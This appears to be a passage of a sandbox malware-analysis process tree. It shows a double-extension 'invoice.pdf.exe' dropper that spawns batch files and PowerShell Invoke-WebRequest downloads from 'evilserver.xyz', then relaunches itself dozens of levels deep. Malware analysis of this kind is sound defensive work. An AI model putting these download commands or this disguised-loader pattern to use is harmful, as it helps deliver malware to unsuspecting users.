C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf53⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1740 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EBF4.tmp\EC05.tmp\EC06.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"54⤵PID:2532
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"55⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1484
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf55⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:804 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EF10.tmp\EF11.tmp\EF12.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"56⤵PID:2448
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"57⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2284
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf57⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2368 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F4DA.tmp\F4DB.tmp\F4DC.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"58⤵PID:1700
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"59⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf59⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2228 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F7A8.tmp\F7A9.tmp\F7AA.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"60⤵PID:2424
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"61⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:304
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf61⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2644 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FC88.tmp\FC89.tmp\FC8A.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"62⤵PID:1592
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"63⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1080
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf63⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2164 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AC.tmp\BD.tmp\BE.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"64⤵PID:2200
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"65⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2808
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf65⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:456 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3B8.tmp\3B9.tmp\3BA.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"66⤵PID:2140
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"67⤵PID:2980
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf67⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1552 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\732.tmp\733.tmp\734.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"68⤵PID:1580
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"69⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2636
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf69⤵PID:1392
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BA4.tmp\BA5.tmp\BA6.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"70⤵PID:2376
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"71⤵PID:2272
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf71⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2616 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E72.tmp\E83.tmp\E84.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"72⤵PID:960
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"73⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2980
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf73⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1020 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\120A.tmp\120B.tmp\120C.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"74⤵PID:2116
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"75⤵PID:2232
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf75⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2372 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\16FA.tmp\16FB.tmp\16FC.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"76⤵PID:2016
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"77⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:108
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf77⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2272 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1A16.tmp\1A17.tmp\1A18.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"78⤵PID:2824
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"79⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2232
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf79⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2156 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1CC4.tmp\1CC5.tmp\1CD6.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"80⤵PID:928
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"81⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1600
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf81⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1480 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\202E.tmp\202F.tmp\2030.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"82⤵PID:2244
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"83⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:608
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf83⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3124 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\233A.tmp\233B.tmp\233C.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"84⤵PID:3144
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"85⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3172
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf85⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3256 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2730.tmp\2731.tmp\2732.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"86⤵PID:3276
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"87⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3304
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf87⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3392 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\29A0.tmp\29A1.tmp\29A2.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"88⤵PID:3412
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"89⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3440
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf89⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3524 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2DC4.tmp\2DC5.tmp\2DC6.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"90⤵PID:3544
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"91⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3572
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf91⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3652 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3360.tmp\3370.tmp\3371.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"92⤵PID:3672
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"93⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3704
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf93⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3792 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\360E.tmp\360F.tmp\3610.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"94⤵PID:3812
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"95⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3840
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf95⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3932 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\38BC.tmp\38BD.tmp\38BE.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"96⤵PID:3952
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"97⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3980
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf97⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:4068 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3D00.tmp\3D01.tmp\3D02.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"98⤵PID:4088
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"99⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3092
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf99⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3208 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3F42.tmp\3F43.tmp\3F44.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"100⤵PID:3236
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"101⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3192
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf101⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3324 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\43B4.tmp\43B5.tmp\43B6.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"102⤵PID:3348
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"103⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3404
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf103⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3532 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\46E0.tmp\46E1.tmp\46E2.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"104⤵PID:3604
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"105⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3584
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf105⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3720 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\49DC.tmp\49DD.tmp\49DE.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"106⤵PID:3788
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"107⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3708
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf107⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3900 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\50FD.tmp\50FE.tmp\50FF.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"108⤵PID:3940
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"109⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4028
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf109⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3116 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\537D.tmp\537E.tmp\537F.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"110⤵PID:608
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"111⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3204
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf111⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3240 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\584D.tmp\584E.tmp\584F.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"112⤵PID:3332
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"113⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3312
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf113⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3516 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5B3A.tmp\5B3B.tmp\5B3C.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"114⤵PID:3624
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"115⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3736
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf115⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3892 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5FBD.tmp\5FBE.tmp\5FCE.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"116⤵PID:2976
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"117⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1876
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf117⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:4004 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\643F.tmp\6440.tmp\6441.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"118⤵PID:2724
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"119⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3996
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf119⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3292 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6799.tmp\679A.tmp\679B.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"120⤵PID:3376
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'http://evilserver.xyz/invoice.pdf' -OutFile invoice.pdf"121⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3340
-
-
C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exeinvoice.pdf121⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3452 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6C98.tmp\6C99.tmp\6C9A.bat C:\Users\Admin\AppData\Local\Temp\invoice.pdf.exe"122⤵PID:3484
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-